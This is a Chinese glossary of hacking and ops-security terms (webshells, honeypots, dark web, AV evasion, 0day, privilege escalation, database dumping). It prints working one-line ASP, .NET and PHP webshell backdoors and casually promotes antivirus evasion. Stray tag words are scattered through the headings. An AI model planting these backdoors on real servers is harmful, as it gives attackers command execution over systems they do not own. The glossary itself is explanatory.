運維安全術語

時間 2019-11-13

原文原文鏈接

什麼是抓雞？php

抓雞是指經過掃描弱口令、爆破、漏洞自動化種馬達到控制機器。
好比：1433抓雞、3389抓雞、3306抓雞等

木馬分類：web

計算機木馬
網頁木馬
- 大馬
- 小馬
- 一句話木馬

網頁木馬shell

webshell就是以asp、php、jsp或者cgi等網頁文件形式存在的一種命令執行環境，也能夠將其稱作爲一種網頁後門。黑客在入侵了一個網站後，一般會將asp或php後門文件與網站服務器WEB目錄下正常的網頁文件混在一塊兒，而後就可使用瀏覽器來訪問asp或者php後門，獲得一個命令執行環境，以達到控制網站服務器的目的。數據庫

小馬瀏覽器

小馬體積小，能夠上傳大文件或者WebShell。
一句話木馬：
ASP: <%execute(request("MH"))%>
.NET:<%@Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
PHP:<?php eval($_POST[a]); ?>

蜜罐：安全

蜜罐技術本質上是一種對攻擊方進行欺騙的技術，經過佈置一些做爲誘餌的主機、網絡服務或者信息，誘使攻擊方對它們實施攻擊，從而能夠對攻擊行爲進行捕獲和分析，瞭解攻擊方所使用的工具與方法，推測攻擊意圖和動機，可以讓防護方清晰地瞭解他們所面對的安全威脅，並經過技術和管理手段來加強實際系統的安全防禦能力。服務器

蜜罐比如是情報收集系統。蜜罐好像是故意讓人攻擊的目標，引誘黑客前來攻擊。因此攻擊者入侵後，你就能夠知道他是如何得逞的，隨時瞭解針對服務器發動的最新的攻擊和漏洞。還能夠經過竊聽黑客之間的聯繫，收集黑客所用的種種工具，而且掌握他們的社交網絡。網絡

暗網：jsp

互聯網由3層網絡組成：表層網；深網；暗網。 LAN ->表層網 -> 深網 -> 暗網暗網是深網的子集深網與暗網的區別？工具

暗網：

「暗網」是指那些除了不能被標準搜索引擎搜索，並且還須要經過一些指定的軟件、通過特殊的受權、或者須要對電腦作一些特殊的設置才能訪問的網絡內容。

深網：

「深網」就是指在互聯網上不能被標準搜索引擎（如百度、谷歌）搜索到的網絡內容。這些不能被搜索的內容有些是通過特殊的加密處理防止被搜索引擎搜索，還有些是由於商業保密的須要，嚴禁搜索引擎對其進行搜索。

從概念上能夠看出，「暗網」屬於「深網」中的一個子集，深網中的其餘內容雖然不能被搜索引擎搜索到，但能夠經過連接來訪問。而暗網是不能單純的經過連接來訪問的，是屬於深網中通過特殊的加密處理，防止被搜索引擎搜索的那一部份內容。

免殺：

您有沒有過心愛的工具被殺毒軟件KILL的經歷；您有沒有過辛辛苦苦整理出來的工具集被殺毒軟件搞成面目全非而「義憤填膺」的時候；您有沒有過好不容易拿到權限，上傳的木馬卻被殺的痛心時刻？免殺，它能作的就是避免這些事情的發生！使殺毒軟件成爲擺設！固然，除此以外免殺技術帶給咱們更多的，將是思想的飛躍與技術的成長。

APT攻擊：

APT（Advanced Persistent Threat）是指高級持續性威脅。利用先進的攻擊手段對特定目標進行長期持續性網絡攻擊的攻擊形式。

中國是APT攻擊的主要受害國

Exploit、POC

常常看一網上有人求助某某某版本EXP。 Exploit 的英文意思就是利用，它在黑客眼裏就是漏洞利用。有漏洞不必定就有Exploit（利用)，有Exploit就確定有漏洞。

概念驗證（英語：Proof of concept，簡稱POC）是對某些想法的一個較短而不完整的實現，以證實其可行性，示範其原理，其目的是爲了驗證一些概念或理論。概念驗證一般被認爲是一個有里程碑意義的實現的原型。

內網滲透：

什麼是內網滲透？爲何要內網滲透？

社會工程學：

在計算機科學中，社會工程學指的是經過與他人的合法地交流，來使其心理受到影響，作出某些動做或者是透露一些機密信息的方式。這一般被認爲是一種欺詐他人以收集信息、行騙和入侵計算機系統的行爲。在英美普通法系中，這一行爲通常是被認做侵犯隱私權的。

谷歌黑客：

谷歌黑客(Google hacking)是使用搜索引擎，好比谷歌來定位因特網上的安全隱患和易攻擊點。Web上通常有兩種容易發現的易受攻擊類型：軟件漏洞和錯誤配置。雖然一些有經驗的入侵者目標是瞄準了一些特殊的系統，同時嘗試發現會讓他們進入的漏洞，可是大部分的入侵者是從具體的軟件漏洞開始或者是從那些普通用戶錯誤配置開始，在這些配置中，他們已經知道怎樣侵入，而且初步的嘗試發現或掃描有該種漏洞的系統。谷歌對於第一種攻擊者來講用處不多，可是對於第二種攻擊者則發揮了重要做用。

脫褲：

脫褲的諧音是對應脫庫。脫庫的意思是：是指經過非法手段獲取網站的數據庫,會員的信息或者本身須要的信息。簡單的說，就是把數據庫下載下來。

提權：

顧名思義拿到WebShell以後從普通用戶提高爲管理員權限。

0day

0day攻擊，一種對計算機軟件的攻擊方式

在計算機領域中，零日漏洞或零時差漏洞（英語：Zero-day exploit、 zero-day、0-day）一般是指尚未補丁的安全漏洞，而零日攻擊或零時差攻擊（英語：Zero-day attack）則是指利用這種漏洞進行的攻擊。提供該漏洞細節或者利用程序的人一般是該漏洞的發現者。零日漏洞的利用程序對網絡安全具備巨大威脅，所以零日漏洞不可是黑客的最愛，掌握多少零日漏洞也成爲評價黑客技術水平的一個重要參數。

旁站、C段

旁站：目標站點所在服務器上其餘網站，而後再想辦法跨到真正目標站點目錄中。

C段：網段中的任意一臺機器，只要子網想同就有可能嗅探到賬號密碼。